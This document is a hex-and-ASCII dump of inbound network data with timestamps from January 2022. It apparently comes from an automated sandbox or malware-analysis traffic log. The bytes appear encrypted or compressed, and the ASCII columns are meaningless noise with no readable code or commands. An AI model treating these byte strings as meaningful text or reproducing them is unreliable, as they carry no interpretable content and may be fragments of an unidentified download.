                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1705INData Raw: 19 80 41 93 fe ef 01 76 4d 0c 0f 07 da 3c b9 8d 40 b2 22 79 3b 43 7b 1f 59 2d cc 4a 7c a7 bc 5b 98 62 6b 21 8c cd a0 89 ad e5 33 ab 97 90 5d 35 b5 3f 2b a9 46 f2 60 46 37 45 b4 45 d6 7e d2 6e c3 bf 58 68 20 f1 04 01 fe 14 fb 4c 1e 07 c9 fc 57 f0 df 38 ed ef 2a c9 7c 47 70 86 ab 35 b8 25 51 05 74 4b e8 9f f6 e1 69 c8 68 cc da aa c0 13 c7 ac 01 9b 23 9a 9b 38 37 4a e2 08 77 00 96 31 52 8d 40 e5 53 44 d1 5c 8e 27 15 b6 fd 1f ec 2d 8d 5e e6 95 7a e8 af a0 fd 26 a4 b3 f0 ed 88 47 be 8e a0 5e 16 d2 37 ba 56 10 44 8c 5f 4f 23 15 e0 a6 bb 6a b2 d6 2f dc 44 59 05 aa 98 43 83 de 92 1c c2 c9 e0 8c fb be f1 10 e8 e7 9e 53 9d 45 7c 15 47 bb 18 d4 e2 3d d7 f3 8f 37 d0 60 27 de c1 57 b2 b6 9b 86 b2 6c ac 6d fa 2a 62 65 3c e5 49 2c 48 47 ed 9c 41 c7 68 68 26 f1 6d 6d a6
                                                                                                                                                                                                    Data Ascii: AvM<@"y;C{Y-J|[bk!3]5?+F`F7EE~nXh LW8*|Gp5%QtKih#87Jw1R@SD\'-^z&G^7VD_O#j/DYCSE|G=7`'Wlm*be<I,HGAhh&mm
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1721INData Raw: 64 41 f5 ff b3 01 bd f8 7e 9f 68 2e 78 b9 fa 54 d8 7c ca cf 72 aa 86 80 32 03 b1 4d 67 02 f5 da cb f9 c3 2d 69 75 13 d1 d4 34 8e 8a f2 27 37 79 8a e0 c1 e2 c4 7d 33 7d 78 d2 5a 33 b4 de f4 94 e0 e7 f5 83 22 26 48 20 04 9d 9c a2 70 63 39 33 99 39 0c c3 a3 ba 27 7f 04 8d d7 07 8d 3f 7b 83 1f 8c 2d f5 f4 36 54 19 b3 95 ed 22 08 7a 67 9d 62 5e a0 20 b4 cd 7d 18 e6 c7 12 76 3f f6 2d 57 68 b2 d4 7f d0 01 06 c0 a4 86 3b 59 08 9f 32 f1 3b b2 4f 6a 8b f7 71 42 9a bd b0 86 cb a1 3c f2 de bc 85 72 06 35 94 2e b4 81 43 da 31 21 d1 d6 6e 00 a2 58 68 c4 be bc 44 6d 38 1d 86 d5 61 65 3d 28 b8 73 d7 76 36 03 36 ba aa be 91 18 15 f6 7a 9c f5 53 47 18 d1 a3 41 cc 2c 8f d1 76 51 44 ec 66 2e 38 fe f7 bc 71 b6 0c 46 7d 5c f5 d0 12 8b 52 5c 18 cb 1b 44 fe 07 86 58 d1 6c 45 6e
                                                                                                                                                                                                    Data Ascii: dA~h.xT|r2Mg-iu4'7y}3}xZ3"&H pc939'?{-6T"zgb^ }v?-Wh;Y2;OjqB<r5.C1!nXhDm8ae=(sv66zSGA,vQDf.8qF}\R\DXlEn
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1737INData Raw: a8 48 7d 32 b8 3c fd ec 88 36 66 31 eb 08 7d 07 8d 7c aa 3b 70 0a 11 3c 37 f3 a0 c6 c9 1e df a1 5b 30 26 2c 76 b0 28 7b 78 3a 4f f1 fb 85 65 ed 0e 09 1d c2 01 dd 0b a7 33 27 5c ee e6 bd 98 40 5a 5b 4a 6a 8a 55 b4 7f 04 7b 44 d9 0d 80 57 b4 f3 7a dd 50 fe b5 fd 4b 10 92 d4 05 7a 03 ad 09 7b 99 c0 d9 b8 99 64 b3 88 cb 1e 02 19 d2 f4 10 88 40 93 b9 fb ab e1 50 4f bd 83 cb d8 68 43 31 3b f6 65 00 78 73 47 ae 7c 24 aa fe 7a 31 b5 bf 3b 73 95 ae 85 21 1c 56 4d fb 9b 26 1f 01 78 bc 41 e2 be e3 a5 61 b2 d8 f7 d1 ab 23 bc af 9a 9e 91 c1 91 c8 8f 22 c6 51 6e 17 9c de 04 e8 75 92 01 f4 9f 71 e3 69 9b 43 3e eb fa 8f b0 26 58 96 ac f6 7c 91 aa 88 31 5e 8d cb 64 65 b0 b5 ce b4 b2 ae 99 f1 93 c7 06 62 97 c7 71 c7 fc 53 0d 2f 9b d8 24 81 9a 21 8d 5d 8b 4d 58 ad 41 ea cc
                                                                                                                                                                                                    Data Ascii: H}2<6f1}|;p<7[0&,v({x:Oe3'\@Z[JjU{DWzPKz{d@POhC1;exsG|$z1;s!VM&xAa#"QnuqiC>&X|1^debqS/$!]MXA
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1753INData Raw: 60 69 7a d8 cd 0d bb 8a 6b 35 a8 70 86 7f b9 af d9 20 de f6 0b 55 be dd 60 c4 45 5f 05 10 fb d3 30 b6 3e 79 9a 63 3e 1e d2 3b d3 f7 8e ae d9 d5 05 39 d4 4c 13 89 16 84 bc 8e 86 d6 26 dd 43 70 0b d8 bd 13 11 5e ef 56 1c 47 bc d7 dd 8a e1 0b de 8b 2d d6 35 c0 ad 8e d5 6d 67 1d 49 24 a7 6b 42 71 32 fd bd 57 0c 03 42 50 df 60 45 65 72 ff 7b c7 35 ec 16 59 a8 23 f7 42 da 54 62 af 58 d2 50 98 92 8c a9 72 86 e4 fa 7b 16 81 33 d4 2c 43 ef 4b c4 bd 70 3e 07 0d 76 dd 41 03 4f ab 69 c0 ed a9 47 9c 11 05 a4 f2 f3 86 1c de 7a d3 50 7b f7 41 94 dc 60 66 b2 04 fa 3f e4 b0 9f 90 07 92 0c 1c 22 e3 c4 f4 98 81 cb 61 6a e6 4c ab 8c 69 b0 a9 a2 02 d9 30 99 5d a9 85 6e fa be fc 2f a9 a9 6e a8 44 fd b2 02 b9 11 36 0b 4f 37 f3 2c 4e ca f6 18 5b 45 32 9a dd e9 bb 2d d8 53 f6 ce
                                                                                                                                                                                                    Data Ascii: `izk5p U`E_0>yc>;9L&Cp^VG-5mgI$kBq2WBP`Eer{5Y#BTbXPr{3,CKp>vAOiGzP{A`f?"ajLi0]n/nD6O7,N[E2-S
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1769INData Raw: 23 05 6f d2 41 c6 04 f7 36 c9 4a 2d 0d 05 38 ac c5 ed fa 49 85 9d 35 c3 51 91 20 78 5d 08 62 a0 b1 cb f1 1a d0 06 b7 74 9b 63 cb 39 ab c7 f2 de fa 17 c0 77 df ca 24 c7 12 e0 01 5e c8 66 e3 ea ea 75 cd 4a 38 b0 87 1f b9 e7 98 b4 d6 da bd fa ab e5 f3 c9 3e 36 0c 82 a0 66 70 de 10 90 6f ad 80 6e 06 10 ed 6f 33 b0 16 cd 0e 05 93 c9 98 9f 67 8e 34 bd 2b 1f ec 39 5a 7e 77 10 62 b6 9d 0f 79 43 9c 17 98 c4 76 7a 47 e5 bd ca 1f 37 71 7e f7 93 be 74 cb 4d d2 6c bb ca a7 8e b8 b5 8d 93 fd 4e 95 ae 1a c2 ba d9 e7 0c 31 3e 8f 64 89 89 5f 7c 8e 60 44 65 db 3a 69 10 61 18 e4 ae f6 3e 6e cf 24 5e 25 17 c5 d5 a9 a2 ae d5 b2 00 93 f8 3a 9f 10 63 5e f3 2b 78 1f 1d ed 82 05 f2 47 9c ed 7b 3f 09 05 ad cc c2 5a da 02 ed ff 6b d0 83 ca 86 b0 a7 ee c5 6c 55 55 c7 35 3d 5b be 92
                                                                                                                                                                                                    Data Ascii: #oA6J-8I5Q x]btc9w$^fuJ8>6fpono3g4+9Z~wbyCvzG7q~tMlN1>d_|`De:ia>n$^%:c^+xG{?ZklUU5=[
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1785INData Raw: 9e 5c 69 97 4a a9 3c 43 43 95 bd f3 6f b7 2f 1f 74 2e 9d c8 4a 25 84 9e df b6 bf 08 80 bc 6f 68 a9 b9 72 6e 22 d0 8f a9 84 f1 20 3d 40 e4 b6 54 f2 e1 1f 91 30 df e4 d1 e3 90 88 c9 bc 37 ea 3f 8b 68 ca 95 af 19 fc 5c 5e 54 99 45 36 8c 6a 54 62 27 d6 92 2d 7c 1e 1a 4b 74 b1 fa eb f4 23 1d 06 3f ee 37 46 6b f4 86 77 b7 cb ad cf fe 44 5c 90 14 8f 0d 23 43 57 60 8a 40 7f 4c 6b 97 d3 48 32 0a b9 f8 6e 89 e2 73 f7 ee e8 a9 3d 8a 4b da f7 4f 99 48 53 0a e3 6d d5 c2 f7 ce 38 80 5b df aa a4 89 68 9d 06 2c 33 9d 23 50 7e fa 57 54 da ab bd 37 44 ec ba 86 b0 d4 27 07 b4 ae 4f eb b2 31 53 51 66 5c 39 30 26 82 4d 7c b8 ea 1f 14 d3 32 2e f8 fc 52 a1 44 6d c9 14 ab 4d 10 28 b7 b2 21 b5 3c f8 e9 2a 1c 7c e4 a4 cc 8d 0d 00 85 2b 66 87 a0 14 42 a2 4d 4a 78 07 e6 9a ee 42 3e
                                                                                                                                                                                                    Data Ascii: \iJ<CCo/t.J%ohrn" =@T07?h\^TE6jTb'-|Kt#?7FkwD\#CW`@LkH2ns=KOHSm8[h,3#P~WT7D'O1SQf\90&M|2.RDmM(!<*|+fBMJxB>
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1801INData Raw: 0c da e4 ba 6f 34 82 61 a5 58 fd 9b bf 6a 26 ec ff 5a f2 18 61 8c a7 5f 49 bd 70 95 ce 91 9d 85 df ea 56 d3 00 4e 3c 59 33 bb 15 3b f4 91 53 d3 e1 90 8a ba 50 f0 b7 4e d0 ff 8c 5b 4d 38 63 53 a9 0e 6c 5a cc 4f c5 bb 0b 39 4d 17 4c 38 ba 61 bd 48 bf 72 d2 5d 68 b1 09 3c 5a 71 3c 4e 9a 4d 5e e1 86 cf 12 5b 03 a6 41 e1 0e de 9c 2f 7e 89 3c 58 be 67 85 9c 2d 48 1f 31 98 0d 00 df 83 6c e6 1f 6c c9 ee 88 f3 b9 d7 a0 40 62 b2 79 b5 5c 51 bf cc 75 56 2d aa fa 5d ce 2c d7 b6 b4 54 31 85 3b 96 e7 33 93 d3 df 69 fe 30 5e f6 d8 98 31 79 78 f6 fe 30 40 9e 05 c3 a6 fc fd 2a 2c 35 80 a2 53 19 b5 39 34 9c 98 fb 23 58 5e ae f3 c9 11 96 da bd 2f b2 17 ce 46 ac a8 54 bc 11 38 cb a8 59 6e 97 85 d3 e2 9d 3b d0 d0 24 3f 5d 18 d7 9c 3e 41 15 dc 82 b7 31 b4 47 d1 f9 3e a7 a0 a1
                                                                                                                                                                                                    Data Ascii: o4aXj&Za_IpVN<Y3;SPN[M8cSlZO9ML8aHr]h<Zq<NM^[A/~<Xg-H1ll@by\QuV-],T1;3i0^1yx0@*,5S94#X^/FT8Yn;$?]>A1G>
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1817INData Raw: 8b 2d 07 af ad ca 6a 56 e8 de 24 62 78 75 3e 76 fa 77 8e 29 58 0d 78 1c 94 8d 1f 02 4f e2 d2 c4 16 20 4e 9f 89 44 85 f2 3b 23 f6 3c 29 a5 db b4 e7 95 91 dc 66 50 47 c2 bc d7 0f aa 4c 1f 97 cb 71 bf 21 b1 00 f5 44 a6 b8 e5 65 a7 23 ec e2 26 8f c0 e6 cb 08 9f c8 a6 5d 3f 25 ce 05 47 57 2b 2f 24 6e 9a 8f 14 2d df 1d 72 d8 71 95 94 44 e4 c5 db 85 07 b8 1f 53 87 6c 8c 95 d5 24 17 32 78 1e fd be 58 1e af aa 8f 95 c7 92 49 4f a0 b3 9d 5f 4f 63 d3 6f 23 8e 94 44 23 62 1b 67 7b 6c 0a f9 99 b1 84 7b 41 97 cc 39 6d 49 c1 45 5b 32 aa b5 3c e5 8f 0d ed 13 90 95 c2 07 96 30 f3 22 0b c6 92 56 17 6b c6 ed d3 27 e2 53 46 90 8a fc 6a e6 11 8f b4 b2 83 9d 33 49 a5 6c ee e1 f6 15 be 5b 0a 75 77 58 48 09 89 7c a8 57 60 fe bd d1 5c 90 9a 6b fa 79 89 60 e9 67 70 41 36 0b 88 86
                                                                                                                                                                                                    Data Ascii: -jV$bxu>vw)XxO ND;#<)fPGLq!De#&]?%GW+/$n-rqDSl$2xXIO_Oco#D#bg{l{A9mIE[2<0"Vk'SFj3Il[uwXH|W`\ky`gpA6
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1833INData Raw: 7c 28 25 7b 89 64 8e 7b d0 bb 74 b8 0b 41 8a 03 e1 da 51 aa 83 37 40 f9 b5 5f e2 da fa d3 71 5f 2f d8 cb 30 1e 3a c8 b2 76 05 ff e8 c5 32 81 b0 58 e7 10 e1 d8 87 d0 1b 11 80 ec 23 b5 34 49 90 e1 72 7d 8b e2 e0 47 3a 90 67 c5 fd 63 2d 44 01 d3 ff 03 84 42 4d e1 d4 3a 87 66 bd 60 ed 1c 10 f7 f8 b9 80 a1 c2 33 f3 0b 79 19 a2 8d c1 95 68 00 9a e6 5e ee 92 a5 2b 97 9d 93 b3 7f 08 92 f8 68 09 14 44 7a 72 1e 31 38 e5 ad 1b 29 f4 a5 e1 29 d3 eb 87 81 e8 c8 42 3b 06 d8 ab ed 78 3a 11 97 27 22 d0 64 26 a7 dc 72 c4 33 35 5d 66 16 be 50 34 d0 46 30 cb a5 1f d0 e7 ab 93 1f 81 31 7e 91 af 80 21 35 18 05 fa d2 56 47 b3 48 79 9b 16 76 6d 56 1e f9 db 13 9c e9 0d 1e bc 6e 98 4b 07 84 cc 00 3c 25 e8 ed b3 07 0f 7c 5a ac 49 cc aa 82 95 36 fb 25 d9 c8 98 3c ca e9 5e 10 64 9c
                                                                                                                                                                                                    Data Ascii: |(%{d{tAQ7@_q_/0:v2X#4Ir}G:gc-DBM:f`3yh^+hDzr18))B;x:'"d&r35]fP4F01~!5VGHyvmVnK<%|ZI6%<^d
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1849INData Raw: 86 79 c3 42 e9 34 db 28 77 e8 35 c6 5f 90 5d 28 cb 6f 91 c9 0c 7a 62 98 db 67 9a b0 4a 92 9c 80 0f 1f 93 b6 04 ab 3d 84 00 97 2f c0 34 b7 5b 53 50 e3 b9 67 17 50 9f e1 4e 6c 31 6a 95 59 fd c7 6d bc 68 97 48 0a 5a d8 57 cb 85 5e 90 b2 30 46 4c 48 2d ac a7 92 ee 9f 9c a3 59 e4 6c 96 cd 37 16 b3 d1 dc 1f 57 7c 63 64 df c1 19 87 ae 82 4e af 8f 6e 57 21 c1 ad ac db 1b e2 69 eb 77 37 6a 5e 9f ab 12 be bb 54 c7 66 a0 51 8c bf e6 17 04 8a 2d 29 ad 4e b6 48 a3 40 9f 53 fd f7 5a c3 cd 99 80 df fa 95 7b ea 0f 64 bb 35 18 c1 da 0e e6 f5 71 5e 93 61 49 3d 21 9d c4 60 19 11 51 02 ea 12 68 c1 f0 9e 18 bb 22 c8 5e a2 48 3f e9 bd f1 66 75 c3 88 76 03 ed 81 70 81 70 38 71 86 01 83 c6 d2 77 c9 c1 a7 0e 69 f3 19 78 d8 fb 69 bc 8e bd 1c ca e0 76 69 e7 3c 07 bc 71 78 24 6b f5
                                                                                                                                                                                                    Data Ascii: yB4(w5_](ozbgJ=/4[SPgPNl1jYmhHZW^0FLH-Yl7W|cdNnW!iw7j^TfQ-)NH@SZ{d5q^aI=!`Qh"^H?fuvpp8qwixivi<qx$k
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1865INData Raw: e6 98 a2 84 83 18 bc 5b fe f1 3b 76 3a f4 df 08 e0 86 41 71 d7 1d 70 22 33 c3 85 5e c4 c3 1d 16 78 4f 0d 05 1c 18 94 95 1a 76 8a 73 b1 b3 e4 e1 0f de a3 45 12 7a a2 9a 02 d7 a5 97 de d6 a9 8d 34 7d a9 c1 ae 44 75 9f 97 1c b5 a0 82 41 cf ed cd 9f ea 4b 83 a3 1b 75 0f f4 e0 9e 46 12 04 3e 73 d9 92 cb 88 e2 f7 49 ee 63 1a 0e ab d5 26 04 bf 66 49 7a 3f 70 b5 11 87 fd 8b 57 77 7e 1e 29 c6 a9 a4 ec 20 e3 99 9b 01 9a e8 43 2b 1c 06 2b f9 57 a5 b5 4b 63 3e 7b b5 7c cc fe 2f 33 09 41 b5 52 ce bd d7 40 26 c6 34 ed d7 93 95 43 25 98 96 71 ec 7d bc ea 0d ee c6 15 4c 0a e6 ba 70 5e 38 99 1c 16 87 3e 70 3f d6 75 da e2 63 00 39 b1 4c 24 de c3 40 aa 14 e5 b4 2b ff 2d 6e da ec 1d b6 e1 13 01 fa 47 38 a5 46 ed 11 23 64 3e 44 f1 86 a7 42 6f 85 aa fe 3f e6 08 77 72 e1 0d 3d
                                                                                                                                                                                                    Data Ascii: [;v:Aqp"3^xOvsEz4}DuAKuF>sIc&fIz?pWw~) C++WKc>{|/3AR@&4C%q}Lp^8>p?uc9L$@+-nG8F#d>DBo?wr=
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1881INData Raw: cd 61 fc d2 a1 21 96 c2 12 77 3c bb 12 eb 90 4a ae fe 2c 20 1f 6b 4f 56 1c 77 20 c5 ef 53 84 b5 49 ab 53 0d 00 9b 96 f3 34 38 c0 c1 6c 49 91 7f c2 8e b7 f3 e6 29 9f 58 7c 44 9f c0 e3 3e e6 46 6a 86 3a 85 ca 06 d1 a6 db 4c 99 5e cd f5 a3 4d 96 dc ac 09 29 1e 69 c3 d8 eb 74 f4 04 54 33 b9 82 db 54 57 0d 09 b0 67 7d f2 21 8d 05 df 5d 66 56 b4 e2 80 50 ed 4f e6 5d 5c 96 ee 2d 4d 68 3a 94 a4 9a 9d 7e e4 23 b5 dd 1c 02 b4 7c 23 0d fd 4e 46 d8 90 b6 43 8b 30 29 16 2f cd fc d3 8e e0 32 f6 1c 53 f3 0f c5 7c d0 74 d7 45 af 80 9e 6c 75 44 31 1f 82 e4 dd 34 c3 11 1b dd ac 95 cd dc c7 d7 a9 93 30 dd a7 db c7 02 9d 2d fa b2 83 15 36 e4 b2 6e 9f 51 f7 12 fe c1 ea 92 1f b5 89 ba 91 b9 bc 9d b1 ac b1 8d 70 66 ff 1d a5 e1 3d c8 1c 9f 89 6c 05 98 53 38 75 2f 30 9c 2b bd 60
                                                                                                                                                                                                    Data Ascii: a!w<J, kOVw SIS48lI)X|D>Fj:L^M)itT3TWg}!]fVPO]\-Mh:~#|#NFC0)/2S|tEluD140-6nQpf=lS8u/0+`
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1897INData Raw: a0 74 79 c3 b6 37 7c b4 79 a8 22 c8 98 f1 76 3e a4 b2 d3 22 60 89 62 a7 4f 46 78 41 c4 c5 e1 40 2e c8 00 ae 4b 7d 10 58 f3 57 ea 2a bb 38 e9 27 af f4 4a e7 36 1d 21 57 ac 8b dc 9f 6d 41 d6 eb ef b8 23 c6 27 c8 10 66 c1 62 b4 93 8a 4f 9c 11 e0 54 96 1a 76 f6 3d 06 91 c1 70 cc be 5d db e2 57 c8 a1 ec ff 99 ef 6a a1 28 3a 5c f0 ad 93 e0 30 52 de 5b 2f c2 07 bf eb 78 b3 8d 4f 77 d4 1b 57 7d c0 a7 ee fd 28 c1 33 b5 d3 a5 88 1c 17 5c c1 c8 fc 4e 36 f4 68 b8 0b 86 40 36 4b 24 da 82 ce 6a cc 88 be 0f 1b 91 23 9a 73 cb c4 ec fc 59 13 4f 86 23 13 bb a1 82 15 db 3d cc 9a 79 9a 87 21 46 40 90 e7 1f ea 19 28 16 fd b3 ec 21 a8 1d 2f 08 ad 7e d5 c2 c1 06 68 a1 fb 5b 67 d3 2b 0a 29 a9 0d 92 e5 4c 16 8d 08 ed 93 7f 74 59 aa 28 fe 9b e2 dc d4 c2 98 97 19 4b 75 d6 39 9e d4
                                                                                                                                                                                                    Data Ascii: ty7|y"v>"`bOFxA@.K}XW*8'J6!WmA#'fbOTv=p]Wj(:\0R[/xOwW}(3\N6h@6K$j#sYO#=y!F@(!/~h[g+)LtY(Ku9
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1913INData Raw: d7 c7 51 62 e7 a0 5f ea a5 84 54 f0 4c 23 71 e5 25 dd 15 f9 f9 a8 42 ee e9 89 eb 79 d0 51 fb 25 a4 69 96 c7 c5 52 b7 0c 94 75 b8 7c 4e 1a 60 b0 2e 33 4e fe 50 bf f5 95 ca 52 c1 db ee f7 54 bb 37 b2 ce 73 df 65 ac ba e6 54 5d 7d 50 06 30 75 aa 85 70 d5 ae 5b 16 4e 0e e6 61 16 95 a9 c4 8c 61 cd 28 19 a7 d1 0b f8 53 a0 18 ea bd af 0a f0 f5 a2 04 33 1e 44 9e a8 d4 11 fc 21 bd 1a c8 1d 6b 3b ec cf 42 a0 4e e2 bb 1e ba 70 55 5f 2c 16 b7 80 26 9c 0e bb d5 4c 64 72 b5 15 9b 66 44 91 8c f5 fc ae 03 2c 90 0c ba 11 5e 00 d1 e1 6e f8 20 ce 79 a5 2a 9b 45 5c 44 87 14 e1 e1 6c d3 9d 40 f4 41 df b2 04 8f 1a 74 73 8b 18 f4 43 43 71 48 96 f9 cd 5e b5 ba 8f c7 c0 aa 0c d6 64 bc 7b 8e 03 04 80 10 4f 09 ba 8e 7a 52 1c 74 83 39 a3 2c b2 e8 14 b4 e1 23 7c 4e e1 2b 6a 37 b8 1f
                                                                                                                                                                                                    Data Ascii: Qb_TL#q%ByQ%iRu|N`.3NPRT7seT]}P0up[Naa(S3D!k;BNpU_,&LdrfD,^n y*E\Dl@AtsCCqH^d{OzRt9,#|N+j7
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1929INData Raw: 2b d7 de a2 7c 40 76 84 94 af 93 8c c7 0e 70 ff 4d ae f0 57 01 4d 58 e2 a3 2e 67 9b bc 81 04 cd 08 04 af ec 4c 01 bb 57 aa 41 b8 e4 76 93 e4 87 18 7d bf 5e f1 a0 a6 db 92 7b 16 33 08 0f 84 01 47 02 c2 b8 74 b0 a3 33 4b e4 2e 73 34 ab de f3 d4 80 6f 75 a2 35 2a e5 41 fc 18 21 27 d6 ef cd 62 46 d5 46 6d 06 6e dc b8 00 30 a6 02 e2 16 9e 7e 74 66 bb eb e3 1e 2c 4f 11 8f a8 8e e0 c9 25 24 08 45 dd 23 a0 86 5b 84 27 ba 15 9d 3f 16 ba 1f 9d 70 24 da c9 8a 78 11 99 10 ef 86 fd a0 02 cb da 09 12 d7 0e e3 e5 2e 1b 1a f2 a5 7a 7d 10 a9 5e aa c7 93 0a 81 d7 a3 ff 7d d4 5f 2d 21 46 e7 de 76 7a 13 17 7f db 15 45 44 18 80 e1 f9 95 cb 5a 90 a3 cc b1 15 ae 87 48 b7 be 08 8b 7e 8e 56 e4 bf ff 36 e7 b7 a5 fb a7 38 62 81 da dc 71 cb c5 1a fc c2 d2 36 94 08 15 88 7d 99 69 3b
                                                                                                                                                                                                    Data Ascii: +|@vpMWMX.gLWAv}^{3Gt3K.s4ou5*A!'bFFmn0~tf,O%$E#['?p$x.z}^}_-!FvzEDZH~V68bq6}i;
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1945INData Raw: ea 72 f8 f4 bf cc d3 ae 7f 74 6b e5 49 3f 88 23 29 73 33 c9 f7 f7 09 d4 f8 3a 50 17 a0 5d 84 16 f4 e6 39 02 46 b5 cf 3b 53 ab 81 5b 39 e3 e2 30 c7 96 b8 15 26 7a 53 55 56 ff 38 4e 1b 58 3a ba 4a 61 d1 bc 08 f3 2b b4 e8 18 0d 54 68 f3 2c 6e 5a aa 78 61 0e c0 ad 5f 86 a1 4e 80 58 7a f1 74 2a 8c 1a f4 3b bc 6a 5a de c2 85 5a 63 a5 19 83 9f df 27 e5 7e 89 bf fa 11 1c 39 99 e0 79 05 78 0b c3 7c 83 a9 7e d8 a3 f5 c5 a3 a0 69 17 30 2d e7 9b ed ee a5 89 7e 91 78 72 58 43 7f 3b c1 e6 42 8e 54 37 32 c7 e4 94 b1 5f 0a 04 a6 48 8e 11 68 63 ad 2a 8a 13 85 a3 7a db e5 da e8 72 6d bd 05 a2 e7 12 61 63 25 98 bb 6c 9b 8f 9b 4d d2 ec 62 b0 67 a3 30 17 f6 ae e7 90 d6 a5 9b 17 ab c7 44 55 e4 dd 4c 18 b1 37 02 df ee af db 3b 10 dc bb 10 06 8e 68 1f cf 15 f7 4c 16 bf e1 af c6
                                                                                                                                                                                                    Data Ascii: rtkI?#)s3:P]9F;S[90&zSUV8NX:Ja+Th,nZxa_NXzt*;jZZc'~9yx|~i0-~xrXC;BT72_Hhc*zrmac%lMbg0DUL7;hL
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1961INData Raw: 4b 40 1b 88 b6 44 2a 51 d0 b9 1c 10 d4 5e 1e 4c 59 00 50 06 53 4f 9b 25 68 39 48 1a ed fb 4d 2e fa ce 62 6d 77 62 cf 70 77 9e eb 80 95 3e ed a8 10 d5 c9 6b ac 52 fb ec fd c7 8c 98 ac 32 a8 b1 17 d9 77 84 7a 2c 81 d2 33 5e 3e 2a 8f b7 70 33 5c 35 76 00 41 46 a6 f5 7d 65 b3 31 74 b7 b8 20 79 a5 54 20 bf 4d 4f 0f 34 73 0d 3c 20 b4 7d 56 23 50 d4 c3 af 9f 17 b6 ca 8d 4b ac 2b 03 14 81 97 1f 45 4e 03 0f b8 36 cb f2 7e 4a 14 8b 4f 32 bd 4e 50 3e 38 91 65 2a e9 9d 40 9e f0 c4 50 5f 50 ab 36 be 62 6d 73 8a 82 21 f4 a7 ac 58 c7 c4 ee be 76 98 da db 24 f0 35 60 26 23 05 2d da 97 cd 5e 52 e7 ef 60 a4 e0 9a d5 d2 4b a7 e7 de 54 19 a7 96 c5 89 c5 f4 a3 11 1c 3f 2f e2 04 0d 04 82 3e 2b 9e 42 e6 e0 13 aa 08 c7 84 3b 13 d7 a8 d3 c7 ac 4d 1c 59 e7 c6 47 04 40 fb 4d 48 8f
                                                                                                                                                                                                    Data Ascii: K@D*Q^LYPSO%h9HM.bmwbpw>kR2wz,3^>*p3\5vAF}e1t yT MO4s< }V#PK+EN6~JO2NP>8e*@P_P6bms!Xv$5`&#-^R`KT?/>+B;MYG@MH
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1977INData Raw: 80 b2 ae 13 98 7b 40 14 7d 84 91 44 1e 11 40 62 6a 13 8d 9a 1e 51 37 b9 53 b7 2a 34 b4 fc ff d4 c3 07 35 8b 5a 56 d7 5c a3 8b 36 a5 dc c9 2c 73 d1 02 d6 7e d2 42 56 6d fb 9f 37 ef 15 d9 0c 1f fd 3e 44 b4 60 f0 11 f7 d4 a0 24 0e 7e 27 be 07 72 ed 80 91 6b cd 3f 9d e4 08 f2 48 0f d8 7b 5b e6 11 d0 0f 11 e1 b5 b1 0d 3f d5 c0 0a c5 34 77 19 3f 6a 93 af fb d9 6b ba dc 38 77 2c 14 79 97 1f 59 59 c9 b8 e0 1d 54 e0 86 e4 7a 7b 3b 0f f5 21 96 2a 02 29 ee 22 02 12 bd 6c 6f a0 48 e4 b2 24 29 c5 f5 fe d4 a4 a9 3b d4 35 65 83 48 2a 87 d6 7f fd b2 87 40 4a ea 5b 54 21 5d 54 0c fc 36 4c f0 72 89 e9 c0 af 47 24 b8 22 ab b0 b7 98 0c 77 8c 0e 83 53 7b a5 74 9f c1 89 ca d0 33 1b c6 3a 84 ee 56 90 c6 61 10 33 ae 5a 1f b6 8c 43 96 f5 71 00 e7 75 3d 07 bb a6 d6 46 7a 72 a8 ef
                                                                                                                                                                                                    Data Ascii: {@}D@bjQ7S*45ZV\6,s~BVm7>D`$~'rk?H{[?4w?jk8w,yYYTz{;!*)"loH$);5eH*@J[T!]T6LrG$"wS{t3:Va3ZCqu=Fzr
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1993INData Raw: 01 ed bf 2c c7 31 ac 60 ed 7e 0c 4a 1d a5 aa c6 94 d2 ee b7 bd 38 b7 51 6d 39 33 5e e4 91 33 6f ba cb 05 82 98 5b 61 8e 43 25 a5 e5 a9 74 df f8 b7 ea c2 ee 6c ed a5 cc a3 3a da 18 d4 7a 1c f6 f0 ab d7 36 fb c4 79 4e b4 52 2c 73 46 fb e7 c5 d1 1e 95 8a c2 a7 d7 d6 cc 54 d4 bb e7 18 b7 47 db 37 ed 41 b7 00 e0 bd 07 59 95 c4 c6 a0 fe 67 99 e8 a8 a8 d9 a2 39 55 93 ff 13 46 2c 87 16 4c 73 24 c3 3e e6 4e 4b d9 57 29 fa 43 96 56 a5 56 72 e0 27 3b ae af f4 91 8f d2 24 9e 60 7e fc 28 61 e0 26 cb 99 3f d1 c5 fb 7c 70 d5 bb 44 e9 e3 6a 79 76 bd df 5a 39 29 a5 7c 04 cd 45 cc d1 f4 73 b3 58 b5 60 b5 1d d0 56 d2 2d ea cb b3 d3 be b9 50 ec fb a3 3b cc cf 7e b7 25 f6 35 ef cf 74 9e e7 af 80 95 b1 c9 cb 99 83 45 98 fa 89 78 23 1b c8 9f c8 13 0f 1f 23 66 da cc df 29 d2 43
                                                                                                                                                                                                    Data Ascii: ,1`~J8Qm93^3o[aC%tl:z6yNR,sFTG7AYg9UF,Ls$>NKW)CVVr';$`~(a&?|pDjyvZ9)|EsX`V-P;~%5tEx##f)C
